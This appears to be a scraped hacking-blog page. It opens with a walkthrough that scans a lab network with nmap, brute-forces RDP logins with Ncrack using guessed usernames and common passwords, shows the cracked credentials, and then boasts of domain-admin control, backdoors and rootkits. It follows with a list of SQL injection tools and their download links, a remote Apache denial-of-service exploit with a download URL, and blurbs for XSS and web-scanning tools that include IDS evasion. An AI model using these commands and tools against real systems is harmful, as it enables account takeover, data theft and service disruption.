mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb
Information gathering

Let’s find out what hosts in a network are up, and save them to a text list. The  regular expression will parse and extract only the ip addresses from the scan.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks
nmap -F -iL 192.168.56.0.txt

Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10

Host is up (0.0017s latency).

Not shown: 91 closed ports

PORT     STATE SERVICE

88/tcp   open  kerberos-sec

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

389/tcp  open  ldap

445/tcp  open  microsoft-ds

1025/tcp open  NFS-or-IIS

1026/tcp open  LSA-or-nterm

1028/tcp open  unknown

3389/tcp open  ms-term-serv

MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101

Host is up (0.014s latency).

Not shown: 96 closed ports

PORT     STATE SERVICE

135/tcp  open  msrpc

139/tcp  open  netbios-ssn

445/tcp  open  microsoft-ds

3389/tcp open  ms-term-serv

MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the microsoft terminal service port (3389) open, looking more in depth to the services available on the machine 192.168.56.10 we can assume that this machine might be the domain controller, and it’s worth trying
to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.
vim my.usr
jtagle
jfeagins
hduchene
trestrepo
kmissildine
We need also a file (my.pwd) for the password, you can look on the internet for common passwords and wordlists.
vim my.pwd
somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1
At this point we run Ncrack against the 192.168.56.10 machine.

ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'

rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.

Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:

192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'

192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'

192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'

192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'

192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.

Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and also we were able to crack the login credential since they were using some weak passwords. Four of the IT staff have some kind of restrictions on the machine, except hduchene that might be the domain administrator, let’s find out.

Run the terminal server client from the Linux box

tsclient 192.168.56.10 use Hugh Duchene credential ‘hduchene’ ‘passw0rd’ and BINGO !!!

At this point we have the control of the entire MEGACORP domain, unlimited access to all the corporate resources related to the domain. We can add users, escalate privileges of existing users, browse over the protected network resources, install backdoors and root-kits, and more and more.

Enjoy ,,

0 SQL Injection Tools

Sqlninja ( http://sqlninja.sourceforge.net/ )
Supports only Microsoft SQL Server.

sqlmap ( http://sqlmap.sourceforge.net/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

Pangolin 3.2.3 free edition ( http://down3.nosec.org/pangolin_free_edition_3.2.3.1105.zip )
Your web applications using Access,DB2,Informix,Microsoft SQL Server 2000,Microsoft SQL Server 2005,Microsoft SQL Server 2008,MySQL,Oracle,PostgreSQL,Sqlite3,Sybase.
Features: Auto-analyzing keyword, HTTPS support, Pre-Login, Bypass firewall setting, Injection Digger, Data dumper, etc.

Havij v1.14 Advanced SQL Injection – free version ( http://www.itsecteam.com/files/havij/Havij1.14Free.rar )
SQL Power Injector ( http://www.sqlpowerinjector.com/ )
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.

SQLIer 0.8.2b  ( http://bcable.net/releases.php?sqlier )
SQLIer takes an SQL Injection vulnerable URL and attempts to determine all the necessary information to build and exploit an SQL Injection hole by itself, requiring no user interaction at all (unless it can’t guess the table/field names correctly). By doing so, SQLIer can build a UNION SELECT query designed to brute force passwords out of the database. This script also does not use quotes in the exploit to operate, meaning it will work for a wider range of sites.

bsqlbf-v2 ( http://code.google.com/p/bsqlbf-v2/ )
Supports: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.

Marathon Tool ( http://www.codeplex.com/marathontool )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.

Absinthe ( http://www.0×90.org/…inthe/index.php )
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.

pysqlin ( http://code.google.c…source/checkout )
Implemented: Oracle, MySQL and Microsoft SQL Server.

BSQL Hacker ( http://labs.portcull…on/bsql-hacker/ )
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.

SQID ( http://sqid.rubyforge.org/#download)
SQL Injection digger (SQLID) is a command line program that looks for SQL injections and common errors in websites. It can perform the follwing operations: look for SQL injection in a web pages and test submit forms for possible SQL injection vulnerabilities

WITOOL ( http://witool.sourceforge.nSQL, Oracle, Microsoft SQL Server and Microsoft Access.et/ )
Implemented: Oracle and Microsoft SQL Server.

sqlus ( http://sqlsus.sourceforge.net/ )
Supports only MySQL.

DarkMySQLi16.py ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

mySQLenum ( http://sourceforge.n…ects/mysqlenum/ )
Supports only MySQL.

PRIAMOS ( http://www.priamos-project.com/ )
Supports only Microsoft SQL Server.

FJ-Injector Framework ( http://sourceforge.net/projects/injection-fwk/files/)
FG-Injector is a free open source framework designed to help find SQL injection vulnerabilities in web applications. It includes a proxy feature for intercepting and modifying HTTP requests, and an interface for automating SQL injection exploitation

SFX-SQLi ( http://www.kachakil.com/ )
Supports only Microsoft SQL Server.

DarkMySQL ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

ProMSiD Premium ( http://forum.web-def…02&postcount=15 )
Supports only MySQL.

Acunetix WVS  ( http://www.acunetix.com/vulnerability-scanner/download.htm)
Automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.

yInjector ( http://y-osirys.com/…-softwares/id10 )
Supports only MySQL.

Bobcat SQL Injection Tool ( http://www.northern-…pub/bobcat.html )

Safe3 Sql Injector ( http://sourceforge.net/projects/safe3si/)
Supports: http, https website, Basic, Digest, NTLM http authentications,GET, Post, Cookie sql injection.
Databases: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
SQL injection techniques: blind, error-based, UNION query and force guess.

ExploitMyUnion ( http://sourceforge.n…exploitmyunion/ )
Laudanum ( http://sourceforge.n…jects/laudanum/ )

Hexjector ( http://sourceforge.n…ects/hexjector/ )

WebRaider ( http://code.google.com/p/webraider/ )
Supports only Microsoft SQL Server.  Designed to execute commands on the server (reverse shell).

Toolza 1.0 ( http://bug-track.ru/prog/toolza1.0.rar )
SQL injection supported DB: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird / Interbase

SCRT Mini-MySqlat0r (http://www.scrt.ch/attaque/telechargements/mini-mysqlat0r)
A multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. It is written in Java and is used through a user-friendly GUI that contains three distinct modules” (Crawler, Tester & Exploiter).

post on comments other sql injection tools that u know 

2 Remote Apache Denial of Service Exploit | coded by ev1lut10n

Download url : http://jayakonstruksi.com/backupintsec/rapache.tgz

bug found by : Nikolaus Rango (Kingcope)
sploit coded by : ev1lut10n
evllut10n's email :  ev1lut10n_exploit@yahoo.com
ev1lut10n's gopher : gopher://sdf.org/1/users/ev1lut10
thanks to: X-hack, Danzel, superman,flyff666,peneter,wenkhairu, fadli,gunslinger,petimati,net_spy, and all my friends and you !
=================
root@ev1l:/home/ev1lut10n# ./rapache
Remote Apache Denial of Service Exploit by ev1lut10n
[-] Usage : ./rapache hostname
root@ev1l:/home/ev1lut10n#
===================

===========
affected:
Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19
==============

0 DFF Scanner

- find files and folders on server
- customized search
- included on BackTrack 4




An web administrator File / Folder Scanner 

DFF Scanner
(download)

0 XSSploit

XSSploit is a multi-platform Cross-Site Scripting scanner and exploiter written in Python. It has been developed to help discovery and exploitation of XSS vulnerabilities in penetration testing missions.
When used against a website, XSSploit first crawls the whole website and identifies encountered forms. It then analyses these forms to automatically detect existing XSS vulnerabilities as well as their main characteristics.

The vulnerabilities that have been discovered can then be exploited using the exploit generation engine of XSSploit. This extensible functionality allows choosing the desired exploit behaviour and automatically generates the corresponding HTML link embedding the exploit payload.
A video is available to explain how to use of XSSploit.

Requirements

The following elements are required by XSSploit:

• Python 2.5
• wxPython GUI toolkit

Downloads

version 0.5
Multi-platform	Xssploit-0.5.tar.gz

0 Webshag

Webshag is a multi-threaded, multi-platform web server audit tool. Written in Python, it gathers commonly useful functionalities for web server auditing like website crawling, URL scanning or file fuzzing.
Webshag can be used to scan a web server in HTTP or HTTPS, through a proxy and using HTTP authentication (Basic and Digest). In addition to that it proposes innovative IDS evasion functionalities aimed at making correlation between request more complicated (e.g. use a different random per request HTTP proxy server).


It also provides innovative functionalities like the capability of retrieving the list of domain names hosted on a target machine and file fuzzing using dynamically generated filenames (in addition to common list-based fuzzing).

Webshag URL scanner and file fuzzer are aimed at reducing the number of false positives and thus producing cleaner result sets. For this purpose, webshag implements a web page fingerprinting mechanism resistant to content changes. This fingerprinting mechanism is then used in a false positive removal algorithm specially aimed at dealing with "soft 404" server responses.
Webshag provides a full featured and intuitive graphical user interface as well as a text-based command line interface and is available for Linux and Windows platforms

Requirements

To be fully functional, webshag requires the following elements:

• Python 2.5/2.6 (NOT compatible with Python 3.0)
• wxPython 2.8.9.0 or greater GUI toolkit
• Nmap port scanner (for port scanning module only)
• A valid Live Search AppID (for domain information module only)

Note: to use installer on Windows Vista, please refer to user manual.

Downloads

version 1.10
Linux (tarball)	ws110.tar.gz
Windows (ZIP archive)	ws110.zip
Windows (installer)	ws110_win32installer.zip
User manual (EN)	ws110_manual.pdf